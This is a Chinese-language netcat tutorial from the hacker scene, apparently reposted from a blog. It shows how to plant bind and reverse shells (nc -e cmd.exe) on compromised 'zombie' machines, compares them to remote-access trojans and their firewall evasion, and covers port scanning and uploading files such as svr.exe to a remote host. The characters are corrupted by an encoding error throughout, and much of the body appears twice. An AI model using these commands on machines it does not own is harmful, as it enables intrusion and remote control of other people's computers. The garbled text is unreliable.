瑞士×××NC
在***界混如果不知道什么叫NC的話,那可真是白混了 今天教大家如何來使用NC 講四個命令 命令1:監(jiān)聽命令 nc -l -p port
nc -l -p port > e:\log.dat
nc -l -v -p port 參數(shù)解釋: -l:監(jiān)聽端口,監(jiān)聽入站信息
-p:后跟本地端口號
-v:顯示端口的信息,如果使用-vv的話,則會顯示端口更詳細(xì)的信息 提示:一般大家都愛用-vv nc -l -p 80 這個很簡單,監(jiān)聽80端口
如果機(jī)器上運(yùn)行這個命令,端口80被認(rèn)為是開放的,可以欺騙很多掃描器的哦! nc -l -p 80 > e:\log.dat 呵呵,功能和上邊一樣,但是后邊加了個“> e:\log.dat”我想,學(xué)過ECHO
那個命令的人都會知道吧,是在E盤創(chuàng)建一個log.dat的曰志文件 nc -l -v -p 80 和上邊命令相似,不過這次不是記錄在文件里,而是會直接顯示在運(yùn)行著NC
的屏幕上。
呵呵,講了這么多,來實踐下 nc -l -v -p 80 然后在瀏覽器中輸入本機(jī)IP:127.0.0.1
呵呵,看到什么?
同樣,上邊兩個也是一樣,大家自己試驗一下吧 命令2:程序定向 nc -l -p port -t -e cmd.exe 本地機(jī): nc -l -p port 或 nc -l -v -p port 目標(biāo)機(jī):nc -e cmd.exe ip port 參數(shù)解釋: -l、-p兩個參數(shù)已經(jīng)解釋過了 -e;作用就是程序定向
-t:以telnet的形式來應(yīng)答 例子 nc -l -p 5277 -t -e cmd.exe 知道運(yùn)行在哪里嗎?千萬不要運(yùn)行在自己的機(jī)器上,如果運(yùn)行了,你機(jī)器
就會變成一臺TELNET的服務(wù)器了,呵呵,解釋一下:監(jiān)聽本地端口5277的
入站信息,同時將CMD.exe這個程序,重定向到端口5277上,當(dāng)有人連接的時候,就讓程序CMD.exe以TELNET的形式來響應(yīng)連接要求。 說白了,其實就是讓他成為一臺TELNET的肉雞,所以這個命令要運(yùn)行在你的肉雞上。。(話外音:說這么多遍當(dāng)我們白癡啊,快往下講!!!) 呵呵,咱們來找臺肉雞試試,我TELNET IP 5277
HOHO~~如何? local machine:nc -l -p port ( or nc -l -v -p port )
remote machine:nc -e cmd.exe ip port 大家知道灰鴿子和神偷吧,這兩款工具都是利用了反彈端口型的***,
什么叫反彈端口?就是說,當(dāng)對方中馬后,不用你主動和對方連接,也就是說
不用從你的client端向?qū)Ψ街鳈C(jī)上運(yùn)行的server端發(fā)送請求連接,而是對方主動來連接你
這樣就可以使很多防火墻失效,因為很多防火墻都不檢查出站請求的。
這里這兩個命令結(jié)合在一起后,于那兩款***可以說有異曲同工之效。為什么?
咳!!聽我給你講啊!!(先交100000000RMB學(xué)費(fèi))哇,別殺我啊!!) nc -l -p 5277 (堅聽本地5277端口) 同樣也可以用 nc -l -v -p 5277 運(yùn)行在本地 然后在遠(yuǎn)程機(jī)器上,想辦法運(yùn)行 nc -e cmd.exe ip 5277 (你可別真的打“ip”在肉機(jī)上啊)要打,xxx.xxx.xxx.xxx這樣!! 呵呵,看看在本地機(jī)器上出現(xiàn)了什么? 這樣就是反彈~~在本地機(jī)器上得到了一個SHELL 命令3:掃描端口 nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port
參數(shù)解釋: -z:將輸入輸出關(guān)掉,在掃描時使用 nc -v ip port 這個命令是針對某一個端口進(jìn)行掃描 例如: nc -v ip 135 掃描遠(yuǎn)程主機(jī)的135端口,這樣獲得了該端口的一些簡單信息,但是針對某些端口,我們還可以獲得更多的信息 例如:80端口 我們可以使用nc -v ip 80 然后使用get方法來獲得對方的WEB服務(wù)器的信息
nc -v -z ip port-port 這個命令是用來掃描的一個命令,這個命令用于快速掃描TCP端口,而port-port則是指定了掃描的端口范圍 例如: nc -v -z ip 1-200 可以看到我機(jī)器上的1-200的TCP端口的開放情況
nc -v -z -u ip port-port 這個命令比上個命令多了個-u,這個命令的作用仍然是掃描端口,只是多了一個-u的參數(shù),是用來掃UDP端口的 例如: nc -v -z -u ip 1-200 這個命令就會掃1-200的UDP端口 命令4:傳送文件(HOHO,I LIKE) LOCAL MACHINE:nc -v -n ip port < x:\svr.exe
REMOTE MACHINE:nc -v -l -p port > y:\svr.exe 參數(shù)解釋: -n:指定數(shù)字的IP地址 這兩個命令結(jié)合起來是用來傳送文件的 首先,在遠(yuǎn)程機(jī)上運(yùn)行命令: nc -v -l -p 5277 > c:\pulist.exe 這個命令還記的嗎?呵呵,是不是和監(jiān)聽命令有點類似,對,沒錯,這個是監(jiān)聽5277端口 并把接受到的信息數(shù)據(jù)寫到c:\pulist.exe中
這時候在本地機(jī)上運(yùn)行 nc -v -n ip 5277 < e:\hack\pulist.exe 這個命令的意思就是,從本地E盤跟目錄中讀取pulist.exe文件的內(nèi)容,并把這些數(shù)據(jù)發(fā)送到ip的5277端口上 這樣遠(yuǎn)程主機(jī)就會自動創(chuàng)建一個pulist.exe文件。。呵呵,你想到了嗎??
上邊是NC的比較常用的方法,希望通過這些,大家能發(fā)揮自己的想象力,創(chuàng)造出更多更精彩的命令來,
因為NC的用法不僅僅局限于這幾種而已哦!!對NC來說,只有想不到,沒有做不到的!!!
nc -l -p port > e:\log.dat
nc -l -v -p port 參數(shù)解釋: -l:監(jiān)聽端口,監(jiān)聽入站信息
-p:后跟本地端口號
-v:顯示端口的信息,如果使用-vv的話,則會顯示端口更詳細(xì)的信息 提示:一般大家都愛用-vv nc -l -p 80 這個很簡單,監(jiān)聽80端口
如果機(jī)器上運(yùn)行這個命令,端口80被認(rèn)為是開放的,可以欺騙很多掃描器的哦! nc -l -p 80 > e:\log.dat 呵呵,功能和上邊一樣,但是后邊加了個“> e:\log.dat”我想,學(xué)過ECHO
那個命令的人都會知道吧,是在E盤創(chuàng)建一個log.dat的曰志文件 nc -l -v -p 80 和上邊命令相似,不過這次不是記錄在文件里,而是會直接顯示在運(yùn)行著NC
的屏幕上。
呵呵,講了這么多,來實踐下 nc -l -v -p 80 然后在瀏覽器中輸入本機(jī)IP:127.0.0.1
呵呵,看到什么?
同樣,上邊兩個也是一樣,大家自己試驗一下吧 命令2:程序定向 nc -l -p port -t -e cmd.exe 本地機(jī): nc -l -p port 或 nc -l -v -p port 目標(biāo)機(jī):nc -e cmd.exe ip port 參數(shù)解釋: -l、-p兩個參數(shù)已經(jīng)解釋過了 -e;作用就是程序定向
-t:以telnet的形式來應(yīng)答 例子 nc -l -p 5277 -t -e cmd.exe 知道運(yùn)行在哪里嗎?千萬不要運(yùn)行在自己的機(jī)器上,如果運(yùn)行了,你機(jī)器
就會變成一臺TELNET的服務(wù)器了,呵呵,解釋一下:監(jiān)聽本地端口5277的
入站信息,同時將CMD.exe這個程序,重定向到端口5277上,當(dāng)有人連接的時候,就讓程序CMD.exe以TELNET的形式來響應(yīng)連接要求。 說白了,其實就是讓他成為一臺TELNET的肉雞,所以這個命令要運(yùn)行在你的肉雞上。。(話外音:說這么多遍當(dāng)我們白癡啊,快往下講!!!) 呵呵,咱們來找臺肉雞試試,我TELNET IP 5277
HOHO~~如何? local machine:nc -l -p port ( or nc -l -v -p port )
remote machine:nc -e cmd.exe ip port 大家知道灰鴿子和神偷吧,這兩款工具都是利用了反彈端口型的***,
什么叫反彈端口?就是說,當(dāng)對方中馬后,不用你主動和對方連接,也就是說
不用從你的client端向?qū)Ψ街鳈C(jī)上運(yùn)行的server端發(fā)送請求連接,而是對方主動來連接你
這樣就可以使很多防火墻失效,因為很多防火墻都不檢查出站請求的。
這里這兩個命令結(jié)合在一起后,于那兩款***可以說有異曲同工之效。為什么?
咳!!聽我給你講啊!!(先交100000000RMB學(xué)費(fèi))哇,別殺我啊!!) nc -l -p 5277 (堅聽本地5277端口) 同樣也可以用 nc -l -v -p 5277 運(yùn)行在本地 然后在遠(yuǎn)程機(jī)器上,想辦法運(yùn)行 nc -e cmd.exe ip 5277 (你可別真的打“ip”在肉機(jī)上啊)要打,xxx.xxx.xxx.xxx這樣!! 呵呵,看看在本地機(jī)器上出現(xiàn)了什么? 這樣就是反彈~~在本地機(jī)器上得到了一個SHELL 命令3:掃描端口 nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port
參數(shù)解釋: -z:將輸入輸出關(guān)掉,在掃描時使用 nc -v ip port 這個命令是針對某一個端口進(jìn)行掃描 例如: nc -v ip 135 掃描遠(yuǎn)程主機(jī)的135端口,這樣獲得了該端口的一些簡單信息,但是針對某些端口,我們還可以獲得更多的信息 例如:80端口 我們可以使用nc -v ip 80 然后使用get方法來獲得對方的WEB服務(wù)器的信息
nc -v -z ip port-port 這個命令是用來掃描的一個命令,這個命令用于快速掃描TCP端口,而port-port則是指定了掃描的端口范圍 例如: nc -v -z ip 1-200 可以看到我機(jī)器上的1-200的TCP端口的開放情況
nc -v -z -u ip port-port 這個命令比上個命令多了個-u,這個命令的作用仍然是掃描端口,只是多了一個-u的參數(shù),是用來掃UDP端口的 例如: nc -v -z -u ip 1-200 這個命令就會掃1-200的UDP端口 命令4:傳送文件(HOHO,I LIKE) LOCAL MACHINE:nc -v -n ip port < x:\svr.exe
REMOTE MACHINE:nc -v -l -p port > y:\svr.exe 參數(shù)解釋: -n:指定數(shù)字的IP地址 這兩個命令結(jié)合起來是用來傳送文件的 首先,在遠(yuǎn)程機(jī)上運(yùn)行命令: nc -v -l -p 5277 > c:\pulist.exe 這個命令還記的嗎?呵呵,是不是和監(jiān)聽命令有點類似,對,沒錯,這個是監(jiān)聽5277端口 并把接受到的信息數(shù)據(jù)寫到c:\pulist.exe中
這時候在本地機(jī)上運(yùn)行 nc -v -n ip 5277 < e:\hack\pulist.exe 這個命令的意思就是,從本地E盤跟目錄中讀取pulist.exe文件的內(nèi)容,并把這些數(shù)據(jù)發(fā)送到ip的5277端口上 這樣遠(yuǎn)程主機(jī)就會自動創(chuàng)建一個pulist.exe文件。。呵呵,你想到了嗎??
上邊是NC的比較常用的方法,希望通過這些,大家能發(fā)揮自己的想象力,創(chuàng)造出更多更精彩的命令來,
因為NC的用法不僅僅局限于這幾種而已哦!!對NC來說,只有想不到,沒有做不到的!!!
轉(zhuǎn)載于:https://blog.51cto.com/justdo/331343
總結(jié)
- 上一篇: SD卡的详细资料(开发文档)
- 下一篇: Win10 Anaconda Promp